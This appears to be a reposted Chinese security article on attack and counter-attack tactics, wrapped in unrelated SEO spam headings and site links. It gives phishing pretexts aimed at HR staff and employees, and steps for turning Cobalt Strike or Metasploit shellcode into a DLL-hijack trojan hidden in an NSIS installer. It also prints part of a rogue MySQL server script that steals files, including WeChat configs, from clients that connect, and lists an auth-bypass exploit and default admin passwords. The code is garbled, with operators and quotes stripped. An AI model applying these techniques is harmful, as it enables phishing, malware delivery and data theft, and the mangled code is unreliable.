当前位置: 首页 > news >正文

网站添加wordpress博客安岳网站建设

网站添加wordpress博客,安岳网站建设,有啥创意可以做商务网站的,网站seo优化总结目录 钓鱼 钓鱼攻击 求职招聘 投毒 社会工程学 仿冒IT运维人员 补贴 吃瓜 反钓鱼攻击 DLL劫持制作木马 NSIS制作安装包 mysql蜜罐 LOAD DATA LOCAL INFILE 蜜罐 溯源反制 溯源 钓鱼邮件溯源 后门木马溯源 NPS 未授权访问 默认密码 灯塔 默认密码 反溯源…目录 钓鱼 钓鱼攻击 求职招聘 投毒 社会工程学 仿冒IT运维人员 补贴 吃瓜 反钓鱼攻击 DLL劫持制作木马 NSIS制作安装包 mysql蜜罐 LOAD DATA LOCAL INFILE 蜜罐 溯源反制 溯源 钓鱼邮件溯源 后门木马溯源 NPS 未授权访问 默认密码 灯塔 默认密码 反溯源 NPS 灯塔 近年来网络安全领域正在经历一场不断升级的攻防对抗这场攻防已经不再局限于传统的攻击与防御模式攻击者和防守者都已经越发熟练对于传统攻防手法了如指掌。 在这个背景下攻击者必须不断寻求创新的途径以突破外部网络目标的坚固防护体系利用零日漏洞、社会工程学手法、供应链攻击、投毒攻击或者更加隐秘的攻击向量以规避传统的检测与响应机制。防守方也不再仅仅依赖于传统的防御策略如IP封锁或简单的入侵检测已经转向主动防御甚至主动进攻采取主动情报收集、分析与分享实时威胁情报监测、云安全服务、容器化防护等安全防护以应对不断进化的威胁。更加激进的防守方会选择积极主动的策略对攻击者发起反制攻击拿下权限获取情报更多的是被逼的谁不想躺两周呢。 本文将探讨这些非常规的攻击与防御手段。 钓鱼 在网络攻防中社会工程学攻击如钓鱼是一种常见的攻击手段。攻击者利用人们的心理和行为特点通过欺骗、伪装等手段获取敏感信息或实施其他恶意活动。 钓鱼攻击 目前钓鱼的形式多种多样有常规钓鱼手段通过邮箱、微信等IM工具钓鱼也有供应链官方升级文件投毒代码投毒。 求职招聘 攻击者伪装求职平台的求职者联系HR私加微信。经常聊天降低风险意识并套话使用的什么终端设别发送伪装成求职简历的木马文件名HR运行上线。 或者伪装HR联系求职者 投毒 在github公众号等地方投毒 供应链投毒 社会工程学 通过在社交平台寻找疑似工作人员重点关注微博抖音快手小红书然后通过OSINT定制化钓鱼攻击博取对方信任然后投放木马 仿冒IT运维人员 以密码过期、系统升级等理由要求打开链接输入账号密码或者下载恶意附件 补贴 吃瓜 通过捏造吃瓜事件吸引受害者点击恶意文件在攻防时慎用此方式钓鱼可能会被警告21年某象 反钓鱼攻击 可以在经过网络隔离的环境中模拟被钓鱼人员运行攻击者的木马程序同时准备一些模拟的敏感文件例如VPN账号和密码、运维手册等等。这样当攻击者尝试下载和运行这个木马程序时可以对其进行反制。 DLL劫持制作木马 合法程序在运行的时候需要加载合法的dll使用恶意的dll通过函数调用劫持合法dll达到运行合法程序加载恶意dll的效果 使用拿破轮胎大佬的工具工具下载网盘链接https://pan.baidu.com/s/1w8T5vgfGnIBU2Gkpq1kogQ 提取码c29j可以直接自动化劫持dll。 使用CS或者MSF的shellcode生成dll文件这时文件目录会自动生成conf.inf文件和wwwcomw.dll文件,然后选择生成的wwwcomw.dll文件和要劫持的exe文件即可生成被劫持的恶意程序。 将conf.inf文件和wwwcomw.dll文件放入到和劫持的文件同一目录点击运行即可执行shellcode NSIS制作安装包 使用nsis可以将上述多个文件打包成一个安装包并可伪装成任意软件。软件下载地址https://www.pc6.com/softview/SoftView_14342.html 软件使用教程https://www.cnblogs.com/modou/p/3573772.html mysql蜜罐 21年国家HW时某知名社区官方账号就曾使用该方法进行钓鱼在一篇分析投毒代码中留下Mysql蜜罐的账号密码吸引好事者登录mysql蜜罐窃取敏感信息。 LOAD DATA LOCAL INFILE LOAD DATA LOCAL INFILE 是 MySQL 中用于将数据从本地文件加载到数据库表中的命令。这个命令允许用户通过指定本地文件的路径将数据导入到数据库表中。 读取服务端上的文件内容存入表中 load data infile 文件 into table 表名 fields terminated by 分隔符;读取客户端上的文件内容存入表中 load data local infile 文件 into table 表名 fields terminated by 分隔符;查看LOAD DATA LOCAL INFILE 功能开关状态 show global variables like local_infile;将LOAD DATA LOCAL INFILE 功能打开 set global local_infile1;蜜罐 利用代码伪造连接信息 尝试读取文件信息 if SET NAMES utf8 in res4:conn.sendall(\x07\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00)res5 conn.recv(9999)if SET character_set_resultsNULL in res5:conn.sendall(\x07\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00)conn.close()else:conn.close()else:conn.close()else:conn.close()else:try:wantfile chr(len(filename) 1) \x00\x00\x01\xFB filenameconn.sendall(wantfile)content conn.recv(99999999)# print(len(content))conn.close()if len(content) 4:if PFRO in filename:with open(logpath /PFRO.log, w) as f:f.write(content)f.close()return Trueelse:with open(logpath / filename.replace(/, _).replace(:, ), w) as f:f.write(content)f.close()return Trueelse:return Falseexcept Exception as e:print (e)except Exception as e:print (e)def run():port 3306sv socket.socket()sv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)sv.bind((,port))sv.listen(100)while True:conn, address sv.accept()logpath os.path.abspath(.) /log/ address[0] /PFRO.logif os.path.exists(logpath):with open(logpath, r)as f:content f.read()f.close()content content.replace(\n,).replace(\r,).replace( ,).replace(\t,).replace(\00,)try:res re.findall(rUsers\\(.*)\\, content)[0]username res.split(\\)[0]line C:/Users/ username /Documents/WeChat Files/All Users/config/config.data if not os.path.exists(os.path.abspath(.) /log/ address[0]/line.replace(/, _).replace(:, )):res mysql_get_file_content(line,conn,address)if res:print (Read Success! --- line)else:print (Not Found~ --- line)else:conn.close()except Exception as e:print(e)else:line C:/Windows/PFRO.logres mysql_get_file_content(line,conn,address)if res:print (Read Success! --- line)else:print (Not Found~ --- line)项目地址https://github.com/fnmsd/MySQL_Fake_Server 溯源反制 溯源 钓鱼邮件溯源 从邮件头入手通常会包括Received字段其中包含有关邮件传输的信息如发件服务器的IP地址对IP地址进行反查溯源。 对邮箱账号进行溯源如“qq.com”、“gmail.com”等此类字符串搜索账号等如果使用的是私有域名邮箱可以从这方面入手有次就碰见EwoMail邮箱管理后台一般为8010端口使用了默认口令admin/ewomail123。 邮件中可能包含域名链接或者后门木马也可进行溯源。 后门木马溯源 后门木马类型可能包括LNK、EXE、DOCX等。DOCX文件可能包含“最后编辑者名称”EXE文件中可能包含PDB信息尤其是在开发人员将项目存放在桌面时这可能会导致编译信息与开发人员的终端名称相关联LNK文件在创建时可能会捕获计算机名称。对回连 C2IP溯源。 NPS 未授权访问 当使用默认配置未配置auth_key参数时可以利用时间戳直接伪造管理员token的漏洞。脚本利用https://github.com/0xf4n9x/NPS-AUTH-BYPASS 默认密码 nps的默认账号密码为admin/123 灯塔 默认密码 灯塔的默认账号密码为admin/arlpass 反溯源 NPS 故意留下未授权访问漏洞或者易被猜解漏洞如HW2023客户端内留下网络隔离环境的代理同反钓鱼攻击。 灯塔 在一次攻防时对攻击IP进行测绘发现灯塔资产使用未授权访问直接进入后台发现大量shell。 还好当时留了个心眼儿用沙箱跑了一下发现全是木马也是学到了一波。 原文地址https://forum.butian.net/share/2454 声明⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的否则后果⾃⾏承担。所有渗透都需获取授权 学习更多渗透技能体验靶场实战练习 免费领取安全学习资料包 https://docs.qq.com/doc/DYlBlQ2xhaFBmamtq
http://www.pierceye.com/news/269605/

相关文章:

  • 网站建设的定位是什么意思php网站开发实例视频
  • 做资讯类网站需要特殊资质吗宜昌网站排名优化
  • 百度怎么建立自己的网站科技公司网站设计公司
  • 长沙做网站的包吃包住4000网站图片如何做水印
  • wordpress的固定链接怎么设置包头整站优化
  • 瓯海建设网站中国建设劳动协会网站
  • 烟台专业做网站公司有哪些中企动力重庆分公司
  • iis 怎么绑定网站二级目录广东东莞市
  • 运城网站制作公司成crm软件
  • 阿里云网站备案登陆荆州网站开发
  • 06628 网页制作与网站建设深圳建筑人才网为什么电脑打不开
  • 企业网站建设方讯快速建站代理
  • 全面的基础微网站开发wordpress首页插件
  • 陕西省住房和城乡建设厅网站上怎么打印证书中盛客户管理软件
  • html网站标题怎么做的国外免费推广平台有哪些
  • 网站制作com cn域名有什么区别网站制作哪家好
  • 平湖网站设计北京广告公司名录
  • 不良网站进入窗口免费正能量安全的南昌网站制作
  • 商品交换电子商务网站开发网站首页制作公司
  • wordpress全站备份建设网站和推广
  • 广州市官网网站建设哪家好上海营销型网站建设公司
  • 江山网站制作瑞安自适应网站建设
  • 生意网官方网站高端建设网站
  • 公司网站建设南宁腾讯企业邮箱登录入口手机版
  • 简历网站推荐做网站公司是干什么的
  • 网站备案率是什么会展相关app和网站的建设情况
  • 南京网站设计网站建设上海网站域名备案处
  • 做网站市场分析三视觉平面设计网
  • 网站建设中++模板企业网站部署计划
  • 房产部门成立网站wordpress站内搜索次数